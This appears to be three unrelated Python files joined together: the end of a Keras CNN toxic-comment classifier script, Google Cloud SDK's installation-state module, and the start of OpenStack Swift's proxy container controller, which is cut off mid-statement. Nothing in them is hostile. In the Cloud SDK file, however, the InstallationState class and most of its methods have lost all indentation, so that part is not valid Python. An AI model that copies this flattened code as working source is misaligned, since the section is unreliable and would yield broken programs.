    tokens = tokenizer.tokenize(doc)
    filtered = [word for word in tokens if word not in stop_words]
    processed_docs_test.append(" ".join(filtered))
#end for
print "tokenizing input data..."
#NOTE: this rebinds ``tokenizer`` from the NLTK tokenizer above to a
#Keras Tokenizer; fit on train+test so both share one vocabulary
tokenizer = Tokenizer(num_words=MAX_NB_WORDS, lower=True, char_level=False)
tokenizer.fit_on_texts(processed_docs_train + processed_docs_test)
word_seq_train = tokenizer.texts_to_sequences(processed_docs_train)
word_seq_test = tokenizer.texts_to_sequences(processed_docs_test)
word_index = tokenizer.word_index
print "dictionary size: ", len(word_index)
#pad sequences
word_seq_train = sequence.pad_sequences(word_seq_train, maxlen=max_seq_len)
word_seq_test = sequence.pad_sequences(word_seq_test, maxlen=max_seq_len)
#training params
batch_size = 256
num_epochs = 16
#model parameters
num_filters = 64
#embed_dim must match the dimensionality of the loaded word vectors
embed_dim = 300
weight_decay = 1e-4
#embedding matrix
print 'preparing embedding matrix...'
words_not_found = []
nb_words = min(MAX_NB_WORDS, len(word_index))
#row i holds the pretrained vector for the word with Keras index i;
#words without a pretrained vector keep an all-zero row
embedding_matrix = np.zeros((nb_words, embed_dim))
for word, i in word_index.items():
    if i >= nb_words:
        continue
    embedding_vector = embeddings_index.get(word)
    if (embedding_vector is not None) and len(embedding_vector) > 0:
        # words not found in embedding index will be all-zeros.
        embedding_matrix[i] = embedding_vector
    else:
        words_not_found.append(word)
print 'number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0)
#CNN architecture: frozen embeddings -> two conv blocks -> global max pool
#-> dense classifier with one sigmoid per label
print "training CNN ..."
model = Sequential()
model.add(Embedding(nb_words, embed_dim,
          weights=[embedding_matrix], input_length=max_seq_len, trainable=False))
model.add(Conv1D(num_filters, 7, activation='relu', padding='same'))
model.add(MaxPooling1D(2))
model.add(Conv1D(num_filters, 7, activation='relu', padding='same'))
model.add(GlobalMaxPooling1D())
model.add(Dropout(0.5))
model.add(Dense(32, activation='relu', kernel_regularizer=regularizers.l2(weight_decay)))
model.add(Dense(num_classes, activation='sigmoid'))  #multi-label (k-hot encoding)
adam = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
#binary cross-entropy treats each label independently (multi-label setup)
model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])
model.summary()
#define callbacks
file_name = SAVE_PATH + 'cnn-weights-checkpoint.h5'
checkpoint = ModelCheckpoint(file_name, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
#tensor_board = TensorBoard(log_dir='./logs', write_graph=True)
hist_lr = LR_hist()
reduce_lr = LearningRateScheduler(step_decay)
#NOTE(review): patience=16 equals num_epochs, so early stopping can
#never trigger here -- confirm this is intentional
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=16, verbose=1)
callbacks_list = [checkpoint, hist_lr, reduce_lr, early_stopping]
#model training
hist = model.fit(word_seq_train, y_train, batch_size=batch_size, epochs=num_epochs, callbacks=callbacks_list, validation_split=0.1, shuffle=True, verbose=2)
model.save(SAVE_PATH + 'cnn_final_model.h5', overwrite=True)
model.save_weights(SAVE_PATH + 'cnn_final_weights.h5',overwrite=True)
#load saved model
#model = load_model(SAVE_PATH + 'final_model.h5')
y_test = model.predict(word_seq_test)
#create a submission
submission_df = pd.DataFrame(columns=['id'] + label_names)
submission_df['id'] = test_df['id'].values
submission_df[label_names] = y_test
submission_df.to_csv("./data/toxic_submission_second.csv", index=False)
#generate plots: training/validation loss curves
plt.figure()
plt.plot(hist.history['loss'], lw=2.0, color='b', label='train')
plt.plot(hist.history['val_loss'], lw=2.0, color='r', label='val')
plt.title('CNN sentiment')
plt.xlabel('Epochs')
plt.ylabel('Cross-Entropy Loss')
plt.legend(loc='upper right')
plt.savefig('./figures/cnn_sentiment_loss.png')
#training/validation accuracy curves
plt.figure()
plt.plot(hist.history['acc'], lw=2.0, color='b', label='train')
plt.plot(hist.history['val_acc'], lw=2.0, color='r', label='val')
plt.title('CNN sentiment')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend(loc='upper left')
plt.savefig('./figures/cnn_sentiment_acc.png')
#learning-rate schedule as recorded by the LR_hist callback
plt.figure()
plt.plot(hist_lr.lr, lw=2.0, label='learning rate')
plt.title('CNN sentiment')
plt.xlabel('Epochs')
plt.ylabel('Learning Rate')
plt.legend()
plt.savefig('./figures/cnn_sentiment_learning_rate.png')
#architecture diagram
plot_model(model, show_shapes=True, to_file='./figures/cnn_sentiment_model.png')
| |
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages the state of what is installed in the cloud SDK.
This tracks the installed modules along with the files they created. It also
provides functionality like extracting tar files into the installation and
tracking when we check for updates.
"""
import compileall
import errno
import logging
import os
import shutil
import sys
from googlecloudsdk.core import config
from googlecloudsdk.core import exceptions
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.updater import installers
from googlecloudsdk.core.updater import snapshots
from googlecloudsdk.core.util import files as file_utils
class Error(exceptions.Error):
  """Base exception for the local_state module.

  All errors raised by this module derive from this class so callers can
  catch them with a single except clause.
  """
  pass
class InvalidSDKRootError(Error):
  """Error for when the root of the Cloud SDK is invalid or cannot be found."""

  def __init__(self):
    # BUG FIX: the original message contained a duplicated word
    # ("re-install the the SDK"); this is user-facing text.
    super(InvalidSDKRootError, self).__init__(
        'The components management action could not be performed because the '
        'installation root of the Cloud SDK could not be located. '
        'If you previously used the Cloud SDK installer, '
        'you could re-install the SDK and retry again.')
class InvalidDownloadError(Error):
  """Exception for when the SDK that was downloaded was invalid."""

  def __init__(self):
    super(InvalidDownloadError, self).__init__(
        'The Cloud SDK download was invalid.')
class PermissionsError(Error):
  """Error for when a file operation cannot complete due to permissions."""

  def __init__(self, message, path):
    """Initialize a PermissionsError.

    Args:
      message: str, The message from the underlying error.
      path: str, The absolute path to a file or directory that needs to be
        operated on, but can't because of insufficient permissions.
    """
    super(PermissionsError, self).__init__(
        '{message}: [{path}]\n\nEnsure you have the permissions to access the '
        'file and that the file is not in use.'
        .format(message=message, path=path))
def _RaisesPermissionsError(func):
  """Use this decorator for functions that deal with files.

  If an exception indicating file permissions is raised, this decorator will
  raise a PermissionsError instead, so that the caller only has to watch for
  one type of exception.

  Args:
    func: The function to decorate.

  Returns:
    The decorated function.
  """
  def _TryFunc(*args, **kwargs):
    try:
      return func(*args, **kwargs)
    except (OSError, IOError) as e:
      if e.errno == errno.EACCES:
        new_exc = PermissionsError(
            message=e.strerror, path=os.path.abspath(e.filename))
        # Maintain original stack trace.
        # (Python 2 three-argument raise: exception, value, traceback.)
        raise new_exc, None, sys.exc_info()[2]
      raise
    except shutil.Error as e:
      # shutil.Error wraps a list of (src, dst, message) tuples; inspect the
      # first one.
      args = e.args[0][0]
      # unfortunately shutil.Error *only* has formatted strings to inspect.
      # Looking for this substring is looking for errno.EACCES, which has
      # a numeric value of 13.
      if args[2].startswith('[Errno 13]'):
        new_exc = PermissionsError(
            message=args[2], path=os.path.abspath(args[0]))
        # Maintain original stack trace.
        raise new_exc, None, sys.exc_info()[2]
      raise
  return _TryFunc
class InstallationState(object):
"""The main class for checking / updating local installation state."""
STATE_DIR_NAME = config.Paths.CLOUDSDK_STATE_DIR
BACKUP_DIR_NAME = '.backup'
TRASH_DIR_NAME = '.trash'
STAGING_ROOT_SUFFIX = '.staging'
COMPONENT_SNAPSHOT_FILE_SUFFIX = '.snapshot.json'
@staticmethod
def ForCurrent():
"""Gets the installation state for the SDK that this code is running in.
Returns:
InstallationState, The state for this area.
Raises:
InvalidSDKRootError: If this code is not running under a valid SDK.
"""
sdk_root = config.Paths().sdk_root
if not sdk_root:
raise InvalidSDKRootError()
return InstallationState(os.path.realpath(sdk_root))
def BackupInstallationState(self):
"""Gets the installation state for the backup of this state, if it exists.
Returns:
InstallationState, The state for this area or None if the backup does not
exist.
"""
if not self.HasBackup():
return None
return InstallationState(os.path.realpath(self.__backup_directory))
@staticmethod
def VersionForInstalledComponent(component_id):
"""Gets the version string for the given installed component.
This function is to be used to get component versions for metrics reporting.
If it fails in any way or if the component_id is unknown, it will return
None. This prevents errors from surfacing when the version is needed
strictly for reporting purposes.
Args:
component_id: str, The component id of the component you want the version
for.
Returns:
str, The installed version of the component, or None if it is not
installed or if an error occurs.
"""
try:
state = InstallationState.ForCurrent()
# pylint: disable=protected-access, This is the same class.
return InstallationManifest(
state._state_directory, component_id).VersionString()
# pylint: disable=bare-except, We never want to fail because of metrics.
except:
logging.debug('Failed to get installed version for component [%s]: [%s]',
component_id, sys.exc_info())
return None
@_RaisesPermissionsError
def __init__(self, sdk_root):
"""Initializes the installation state for the given sdk install.
Args:
sdk_root: str, The file path of the root of the SDK installation.
Raises:
ValueError: If the given SDK root does not exist.
"""
if not os.path.isdir(sdk_root):
raise ValueError('The given Cloud SDK root does not exist: [{0}]'
.format(sdk_root))
self.__sdk_root = sdk_root
self._state_directory = os.path.join(sdk_root,
InstallationState.STATE_DIR_NAME)
self.__backup_directory = os.path.join(self._state_directory,
InstallationState.BACKUP_DIR_NAME)
self.__trash_directory = os.path.join(self._state_directory,
InstallationState.TRASH_DIR_NAME)
self.__sdk_staging_root = (os.path.normpath(self.__sdk_root) +
InstallationState.STAGING_ROOT_SUFFIX)
@_RaisesPermissionsError
def _CreateStateDir(self):
"""Creates the state directory if it does not exist."""
if not os.path.isdir(self._state_directory):
file_utils.MakeDir(self._state_directory)
@property
def sdk_root(self):
"""Gets the root of the SDK that this state corresponds to.
Returns:
str, the path to the root directory.
"""
return self.__sdk_root
def _FilesForSuffix(self, suffix):
"""Returns the files in the state directory that have the given suffix.
Args:
suffix: str, The file suffix to match on.
Returns:
list of str, The file names that match.
"""
if not os.path.isdir(self._state_directory):
return []
files = os.listdir(self._state_directory)
matching = [f for f in files
if os.path.isfile(os.path.join(self._state_directory, f))
and f.endswith(suffix)]
return matching
@_RaisesPermissionsError
def InstalledComponents(self):
"""Gets all the components that are currently installed.
Returns:
A dictionary of component id string to InstallationManifest.
"""
snapshot_files = self._FilesForSuffix(
InstallationState.COMPONENT_SNAPSHOT_FILE_SUFFIX)
manifests = {}
for f in snapshot_files:
component_id = f[:-len(InstallationState.COMPONENT_SNAPSHOT_FILE_SUFFIX)]
manifests[component_id] = InstallationManifest(self._state_directory,
component_id)
return manifests
@_RaisesPermissionsError
def Snapshot(self):
"""Generates a ComponentSnapshot from the currently installed components."""
return snapshots.ComponentSnapshot.FromInstallState(self)
def DiffCurrentState(self, latest_snapshot, platform_filter=None):
"""Generates a ComponentSnapshotDiff from current state and the given state.
Args:
latest_snapshot: snapshots.ComponentSnapshot, The current state of the
world to diff against.
platform_filter: platforms.Platform, A platform that components must
match in order to be considered for any operations.
Returns:
A ComponentSnapshotDiff.
"""
return self.Snapshot().CreateDiff(latest_snapshot,
platform_filter=platform_filter)
@_RaisesPermissionsError
def CloneToStaging(self, progress_callback=None):
"""Clones this state to the temporary staging area.
This is used for making temporary copies of the entire Cloud SDK
installation when doing updates. The entire installation is cloned, but
doing so removes any backups and trash from this state before doing the
copy.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
Returns:
An InstallationState object for the cloned install.
"""
self._CreateStateDir()
(rm_staging_cb, rm_backup_cb, rm_trash_cb, copy_cb) = (
console_io.ProgressBar.SplitProgressBar(progress_callback,
[1, 1, 1, 7]))
self._ClearStaging(progress_callback=rm_staging_cb)
self.ClearBackup(progress_callback=rm_backup_cb)
self.ClearTrash(progress_callback=rm_trash_cb)
class Counter(object):
def __init__(self, progress_callback, total):
self.count = 0
self.progress_callback = progress_callback
self.total = float(total)
# This function must match the signature that shutil expects for the
# ignore function.
def Tick(self, *unused_args):
self.count += 1
self.progress_callback(self.count / self.total)
return []
if progress_callback:
# This takes a little time, so only do it if we are going to report
# progress.
dirs = set()
for _, manifest in self.InstalledComponents().iteritems():
dirs.update(manifest.InstalledDirectories())
# There is always the root directory itself and the .install directory.
# In general, there could be in the SDK (if people just put stuff in there
# but this is fine for an estimate. The progress bar will at worst stay
# at 100% for slightly longer.
total_dirs = len(dirs) + 2
ticker = Counter(copy_cb, total_dirs).Tick if total_dirs else None
else:
ticker = None
shutil.copytree(self.__sdk_root, self.__sdk_staging_root, symlinks=True,
ignore=ticker)
staging_state = InstallationState(self.__sdk_staging_root)
# pylint: disable=protected-access, This is an instance of InstallationState
staging_state._CreateStateDir()
return staging_state
@_RaisesPermissionsError
def CreateStagingFromDownload(self, url, progress_callback=None):
"""Creates a new staging area from a fresh download of the Cloud SDK.
Args:
url: str, The url to download the new SDK from.
progress_callback: f(float), A function to call with the fraction of
completeness.
Returns:
An InstallationState object for the new install.
Raises:
installers.URLFetchError: If the new SDK could not be downloaded.
InvalidDownloadError: If the new SDK was malformed.
"""
self._ClearStaging()
with file_utils.TemporaryDirectory() as t:
download_dir = os.path.join(t, '.download')
extract_dir = os.path.join(t, '.extract')
installers.ComponentInstaller.DownloadAndExtractTar(
url, download_dir, extract_dir, progress_callback=progress_callback,
command_path='components.reinstall')
files = os.listdir(extract_dir)
if len(files) != 1:
raise InvalidDownloadError()
sdk_root = os.path.join(extract_dir, files[0])
file_utils.MoveDir(sdk_root, self.__sdk_staging_root)
staging_sdk = InstallationState(self.__sdk_staging_root)
# pylint: disable=protected-access, This is an instance of InstallationState
staging_sdk._CreateStateDir()
self.CopyMachinePropertiesTo(staging_sdk)
return staging_sdk
@_RaisesPermissionsError
def ReplaceWith(self, other_install_state, progress_callback=None):
"""Replaces this installation with the given other installation.
This moves the current installation to the backup directory of the other
installation. Then, it moves the entire second installation to replace
this one on the file system. The result is that the other installation
completely replaces the current one, but the current one is snapshotted and
stored as a backup under the new one (and can be restored later).
Args:
other_install_state: InstallationState, The other state with which to
replace this one.
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
self._CreateStateDir()
self.ClearBackup()
self.ClearTrash()
# pylint: disable=protected-access, This is an instance of InstallationState
other_install_state._CreateStateDir()
other_install_state.ClearBackup()
# pylint: disable=protected-access, This is an instance of InstallationState
file_utils.MoveDir(self.__sdk_root, other_install_state.__backup_directory)
if progress_callback:
progress_callback(0.5)
file_utils.MoveDir(other_install_state.__sdk_root, self.__sdk_root)
if progress_callback:
progress_callback(1.0)
@_RaisesPermissionsError
def RestoreBackup(self):
"""Restore the backup from this install state if it exists.
If this installation has a backup stored in it (created by and update that
used ReplaceWith(), above), it replaces this installation with the backup,
using a temporary staging area. This installation is moved to the trash
directory under the installation that exists after this is done. The trash
directory can be removed at any point in the future. We just don't want to
delete code that is running since some platforms have a problem with that.
Returns:
bool, True if there was a backup to restore, False otherwise.
"""
if not self.HasBackup():
return False
self._ClearStaging()
file_utils.MoveDir(self.__backup_directory, self.__sdk_staging_root)
staging_state = InstallationState(self.__sdk_staging_root)
# pylint: disable=protected-access, This is an instance of InstallationState
staging_state._CreateStateDir()
staging_state.ClearTrash()
# pylint: disable=protected-access, This is an instance of InstallationState
file_utils.MoveDir(self.__sdk_root, staging_state.__trash_directory)
file_utils.MoveDir(staging_state.__sdk_root, self.__sdk_root)
return True
def HasBackup(self):
"""Determines if this install has a valid backup that can be restored.
Returns:
bool, True if there is a backup, False otherwise.
"""
return os.path.isdir(self.__backup_directory)
def BackupDirectory(self):
"""Gets the backup directory of this installation if it exists.
Returns:
str, The path to the backup directory or None if it does not exist.
"""
if self.HasBackup():
return self.__backup_directory
return None
@_RaisesPermissionsError
def _ClearStaging(self, progress_callback=None):
"""Deletes the current staging directory if it exists.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
if os.path.exists(self.__sdk_staging_root):
file_utils.RmTree(self.__sdk_staging_root)
if progress_callback:
progress_callback(1)
@_RaisesPermissionsError
def ClearBackup(self, progress_callback=None):
"""Deletes the current backup if it exists.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
if os.path.isdir(self.__backup_directory):
file_utils.RmTree(self.__backup_directory)
if progress_callback:
progress_callback(1)
@_RaisesPermissionsError
def ClearTrash(self, progress_callback=None):
"""Deletes the current trash directory if it exists.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
if os.path.isdir(self.__trash_directory):
file_utils.RmTree(self.__trash_directory)
if progress_callback:
progress_callback(1)
def _GetInstaller(self, snapshot):
"""Gets a component installer based on the given snapshot.
Args:
snapshot: snapshots.ComponentSnapshot, The snapshot that describes the
component to install.
Returns:
The installers.ComponentInstaller.
"""
return installers.ComponentInstaller(self.__sdk_root,
self._state_directory,
snapshot)
@_RaisesPermissionsError
def Install(self, snapshot, component_id, progress_callback=None,
command_path='unknown'):
"""Installs the given component based on the given snapshot.
Args:
snapshot: snapshots.ComponentSnapshot, The snapshot that describes the
component to install.
component_id: str, The component to install from the given snapshot.
progress_callback: f(float), A function to call with the fraction of
completeness.
command_path: the command path to include in the User-Agent header if the
URL is HTTP
Raises:
installers.URLFetchError: If the component associated with the provided
component ID has a URL that is not fetched correctly.
"""
self._CreateStateDir()
files = self._GetInstaller(snapshot).Install(
component_id, progress_callback=progress_callback,
command_path=command_path)
manifest = InstallationManifest(self._state_directory, component_id)
manifest.MarkInstalled(snapshot, files)
@_RaisesPermissionsError
def Uninstall(self, component_id, progress_callback=None):
"""Uninstalls the given component.
Deletes all the files for this component and marks it as no longer being
installed.
Args:
component_id: str, The id of the component to uninstall.
progress_callback: f(float), A function to call with the fraction of
completeness.
"""
manifest = InstallationManifest(self._state_directory, component_id)
paths = manifest.InstalledPaths()
total_paths = float(len(paths))
root = self.__sdk_root
dirs_to_remove = set()
for num, p in enumerate(paths, start=1):
path = os.path.join(root, p)
if os.path.isfile(path) or os.path.islink(path):
os.remove(path)
# Clean up the pyc files that correspond to any py files being removed.
if p.endswith('.py'):
pyc_path = path + 'c'
if os.path.isfile(pyc_path):
os.remove(pyc_path)
dir_path = os.path.dirname(path)
if dir_path:
dirs_to_remove.add(os.path.normpath(dir_path))
elif os.path.isdir(path):
dirs_to_remove.add(os.path.normpath(path))
if progress_callback:
progress_callback(num / total_paths)
# Remove dirs from the bottom up. Subdirs will always have a longer path
# than it's parent.
for d in sorted(dirs_to_remove, key=len, reverse=True):
if os.path.isdir(d) and not os.path.islink(d) and not os.listdir(d):
os.rmdir(d)
manifest.MarkUninstalled()
def CopyMachinePropertiesTo(self, other_state):
    """Copy this state's properties file to another state.

    This is primarily intended to be used to maintain the machine properties
    file during a schema-change-induced reinstall.

    Args:
      other_state: InstallationState, The installation state of the fresh
        Cloud SDK that needs the properties file mirrored in.
    """
    properties_name = config.Paths.CLOUDSDK_PROPERTIES_NAME
    source_path = os.path.join(self.sdk_root, properties_name)
    # Nothing to mirror if this installation has no properties file.
    if not os.path.exists(source_path):
        return
    destination_path = os.path.join(other_state.sdk_root, properties_name)
    shutil.copyfile(source_path, destination_path)
def CompilePythonFiles(self):
    """Attempts to compile all the python files into .pyc files.

    This does not raise exceptions if compiling a given file fails.
    """
    root = self.sdk_root
    # Only these subtrees contain Python source shipped with the SDK.
    for relative_parts in (('bin', 'bootstrapping'), ('lib',), ('platform',)):
        compileall.compile_dir(os.path.join(root, *relative_parts),
                               quiet=True)
class InstallationManifest(object):
    """Class to encapsulate the data stored in installation manifest files."""

    MANIFEST_SUFFIX = '.manifest'

    def __init__(self, state_dir, component_id):
        """Creates a new InstallationManifest.

        Args:
          state_dir: str, The directory path where install state is stored.
          component_id: str, The component id that you want to get the
            manifest for.
        """
        self.state_dir = state_dir
        self.id = component_id
        snapshot_name = (
            component_id + InstallationState.COMPONENT_SNAPSHOT_FILE_SUFFIX)
        manifest_name = component_id + InstallationManifest.MANIFEST_SUFFIX
        self.snapshot_file = os.path.join(self.state_dir, snapshot_name)
        self.manifest_file = os.path.join(self.state_dir, manifest_name)

    def MarkInstalled(self, snapshot, files):
        """Marks this component as installed with the given snapshot and files.

        This saves the ComponentSnapshot and writes the installed files to a
        manifest so they can be removed later.

        Args:
          snapshot: snapshots.ComponentSnapshot, The snapshot that was the
            source of the install.
          files: list of str, The files that were created by the installation.
        """
        with open(self.manifest_file, 'w') as fp:
            fp.writelines(f + '\n' for f in files)
        snapshot.WriteToFile(self.snapshot_file)

    def MarkUninstalled(self):
        """Marks this component as no longer being installed.

        This does not actually uninstall the component, but rather just
        removes the snapshot and manifest.
        """
        for state_file in (self.manifest_file, self.snapshot_file):
            if os.path.isfile(state_file):
                os.remove(state_file)

    def ComponentSnapshot(self):
        """Loads the local ComponentSnapshot for this component.

        Returns:
          The snapshots.ComponentSnapshot for this component.
        """
        return snapshots.ComponentSnapshot.FromFile(self.snapshot_file)

    def ComponentDefinition(self):
        """Loads the ComponentSnapshot and gets the schemas.Component.

        Returns:
          The schemas.Component for this component.
        """
        return self.ComponentSnapshot().ComponentFromId(self.id)

    def VersionString(self):
        """Gets the version string of this component as it was installed.

        Returns:
          str, The installed version of this component.
        """
        return self.ComponentDefinition().version.version_string

    def InstalledPaths(self):
        """Gets the list of files and dirs created by installing this component.

        Returns:
          list of str, The files and directories installed by this component.
        """
        with open(self.manifest_file) as f:
            return [line.rstrip() for line in f]

    def InstalledDirectories(self):
        """Gets the set of directories created by installing this component.

        Returns:
          set(str), The directories installed by this component.
        """
        # Directory entries are written with a trailing '/' in the manifest.
        with open(self.manifest_file) as f:
            return set(line.rstrip() for line in f
                       if line.rstrip().endswith('/'))
| |
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from swift import gettext_ as _
import time
from six.moves.urllib.parse import unquote
from swift.common.utils import public, csv_append, Timestamp
from swift.common.constraints import check_metadata
from swift.common import constraints
from swift.common.http import HTTP_ACCEPTED, is_success
from swift.proxy.controllers.base import Controller, delay_denial, \
cors_validation, set_info_cache, clear_info_cache
from swift.common.storage_policy import POLICIES
from swift.common.swob import HTTPBadRequest, HTTPForbidden, \
HTTPNotFound
class ContainerController(Controller):
    """WSGI controller for container requests"""
    server_type = 'Container'

    # Ensure these are all lowercase
    pass_through_headers = ['x-container-read', 'x-container-write',
                            'x-container-sync-key', 'x-container-sync-to',
                            'x-versions-location']

    def __init__(self, app, account_name, container_name, **kwargs):
        Controller.__init__(self, app)
        # Names arrive URL-encoded from the WSGI request path.
        self.account_name = unquote(account_name)
        self.container_name = unquote(container_name)

    def _x_remove_headers(self):
        # Headers a client may send to delete the corresponding container
        # metadata/ACL values.
        st = self.server_type.lower()
        return ['x-remove-%s-read' % st,
                'x-remove-%s-write' % st,
                'x-remove-versions-location',
                'x-remove-%s-sync-key' % st,
                'x-remove-%s-sync-to' % st]

    def _convert_policy_to_index(self, req):
        """
        Helper method to convert a policy name (from a request from a client)
        to a policy index (for a request to a backend).

        :param req: incoming request
        :returns: int policy index, or None when the request carries no
                  X-Storage-Policy header
        :raises HTTPBadRequest: if the named policy is unknown or deprecated
        """
        policy_name = req.headers.get('X-Storage-Policy')
        if not policy_name:
            return
        policy = POLICIES.get_by_name(policy_name)
        if not policy:
            raise HTTPBadRequest(request=req,
                                 content_type="text/plain",
                                 body=("Invalid %s '%s'"
                                       % ('X-Storage-Policy', policy_name)))
        if policy.is_deprecated:
            body = 'Storage Policy %r is deprecated' % (policy.name)
            raise HTTPBadRequest(request=req, body=body)
        return int(policy)

    def clean_acls(self, req):
        # Run the auth middleware's ACL cleaner (when installed) over the
        # container read/write ACL headers; a ValueError from the cleaner
        # becomes a 400 response. Returns None when the headers are fine.
        if 'swift.clean_acl' in req.environ:
            for header in ('x-container-read', 'x-container-write'):
                if header in req.headers:
                    try:
                        req.headers[header] = \
                            req.environ['swift.clean_acl'](header,
                                                           req.headers[header])
                    except ValueError as err:
                        return HTTPBadRequest(request=req, body=str(err))
        return None

    def GETorHEAD(self, req):
        """Handler for HTTP GET/HEAD requests."""
        ai = self.account_info(self.account_name, req)
        # ai[1] is the container count; falsy here means the account does
        # not exist (or could not be confirmed).
        if not ai[1]:
            if 'swift.authorize' in req.environ:
                aresp = req.environ['swift.authorize'](req)
                if aresp:
                    # Don't cache this. It doesn't reflect the state of the
                    # container, just that the user can't access it.
                    return aresp
            # Don't cache this. The lack of account will be cached, and that
            # is sufficient.
            return HTTPNotFound(request=req)
        part = self.app.container_ring.get_part(
            self.account_name, self.container_name)
        # With concurrent_gets enabled, query all replicas concurrently.
        concurrency = self.app.container_ring.replica_count \
            if self.app.concurrent_gets else 1
        node_iter = self.app.iter_nodes(self.app.container_ring, part)
        resp = self.GETorHEAD_base(
            req, _('Container'), node_iter, part,
            req.swift_entity_path, concurrency)
        # Cache this. We just made a request to a storage node and got
        # up-to-date information for the container.
        resp.headers['X-Backend-Recheck-Container-Existence'] = str(
            self.app.recheck_container_existence)
        set_info_cache(self.app, req.environ, self.account_name,
                       self.container_name, resp)
        if 'swift.authorize' in req.environ:
            req.acl = resp.headers.get('x-container-read')
            aresp = req.environ['swift.authorize'](req)
            if aresp:
                # Don't cache this. It doesn't reflect the state of the
                # container, just that the user can't access it.
                return aresp
        if not req.environ.get('swift_owner', False):
            # Strip administrative (owner-only) headers for non-owners.
            for key in self.app.swift_owner_headers:
                if key in resp.headers:
                    del resp.headers[key]
        return resp

    @public
    @delay_denial
    @cors_validation
    def GET(self, req):
        """Handler for HTTP GET requests."""
        return self.GETorHEAD(req)

    @public
    @delay_denial
    @cors_validation
    def HEAD(self, req):
        """Handler for HTTP HEAD requests."""
        return self.GETorHEAD(req)

    @public
    @cors_validation
    def PUT(self, req):
        """HTTP PUT request handler."""
        error_response = \
            self.clean_acls(req) or check_metadata(req, 'container')
        if error_response:
            return error_response
        policy_index = self._convert_policy_to_index(req)
        if not req.environ.get('swift_owner'):
            # Non-owners may not set administrative headers.
            for key in self.app.swift_owner_headers:
                req.headers.pop(key, None)
        if len(self.container_name) > constraints.MAX_CONTAINER_NAME_LENGTH:
            resp = HTTPBadRequest(request=req)
            resp.body = 'Container name length of %d longer than %d' % \
                        (len(self.container_name),
                         constraints.MAX_CONTAINER_NAME_LENGTH)
            return resp
        account_partition, accounts, container_count = \
            self.account_info(self.account_name, req)
        if not accounts and self.app.account_autocreate:
            # Create the account on the fly, then re-fetch its info.
            self.autocreate_account(req, self.account_name)
            account_partition, accounts, container_count = \
                self.account_info(self.account_name, req)
        if not accounts:
            return HTTPNotFound(request=req)
        if 0 < self.app.max_containers_per_account <= container_count and \
                self.account_name not in self.app.max_containers_whitelist:
            # Over the limit: only allow the PUT if the container already
            # exists (the request is then just a metadata update).
            container_info = \
                self.container_info(self.account_name, self.container_name,
                                    req)
            if not is_success(container_info.get('status')):
                resp = HTTPForbidden(request=req)
                resp.body = 'Reached container limit of %s' % \
                    self.app.max_containers_per_account
                return resp
        container_partition, containers = self.app.container_ring.get_nodes(
            self.account_name, self.container_name)
        headers = self._backend_requests(req, len(containers),
                                         account_partition, accounts,
                                         policy_index)
        clear_info_cache(self.app, req.environ,
                         self.account_name, self.container_name)
        resp = self.make_requests(
            req, self.app.container_ring,
            container_partition, 'PUT', req.swift_entity_path, headers)
        return resp

    @public
    @cors_validation
    def POST(self, req):
        """HTTP POST request handler."""
        error_response = \
            self.clean_acls(req) or check_metadata(req, 'container')
        if error_response:
            return error_response
        if not req.environ.get('swift_owner'):
            # Non-owners may not set administrative headers.
            for key in self.app.swift_owner_headers:
                req.headers.pop(key, None)
        account_partition, accounts, container_count = \
            self.account_info(self.account_name, req)
        if not accounts:
            return HTTPNotFound(request=req)
        container_partition, containers = self.app.container_ring.get_nodes(
            self.account_name, self.container_name)
        headers = self.generate_request_headers(req, transfer=True)
        clear_info_cache(self.app, req.environ,
                         self.account_name, self.container_name)
        resp = self.make_requests(
            req, self.app.container_ring, container_partition, 'POST',
            req.swift_entity_path, [headers] * len(containers))
        return resp

    @public
    @cors_validation
    def DELETE(self, req):
        """HTTP DELETE request handler."""
        account_partition, accounts, container_count = \
            self.account_info(self.account_name, req)
        if not accounts:
            return HTTPNotFound(request=req)
        container_partition, containers = self.app.container_ring.get_nodes(
            self.account_name, self.container_name)
        headers = self._backend_requests(req, len(containers),
                                         account_partition, accounts)
        clear_info_cache(self.app, req.environ,
                         self.account_name, self.container_name)
        resp = self.make_requests(
            req, self.app.container_ring, container_partition, 'DELETE',
            req.swift_entity_path, headers)
        # Indicates no server had the container
        if resp.status_int == HTTP_ACCEPTED:
            return HTTPNotFound(request=req)
        return resp

    def _backend_requests(self, req, n_outgoing, account_partition, accounts,
                          policy_index=None):
        """Build one header dict per outgoing backend container request.

        The account partition/host/device entries are spread round-robin
        across the header dicts, so each container server updates a
        (mostly) distinct account replica.
        """
        additional = {'X-Timestamp': Timestamp(time.time()).internal}
        if policy_index is None:
            additional['X-Backend-Storage-Policy-Default'] = \
                int(POLICIES.default)
        else:
            additional['X-Backend-Storage-Policy-Index'] = str(policy_index)
        headers = [self.generate_request_headers(req, transfer=True,
                                                 additional=additional)
                   for _junk in range(n_outgoing)]
        for i, account in enumerate(accounts):
            i = i % len(headers)
            headers[i]['X-Account-Partition'] = account_partition
            headers[i]['X-Account-Host'] = csv_append(
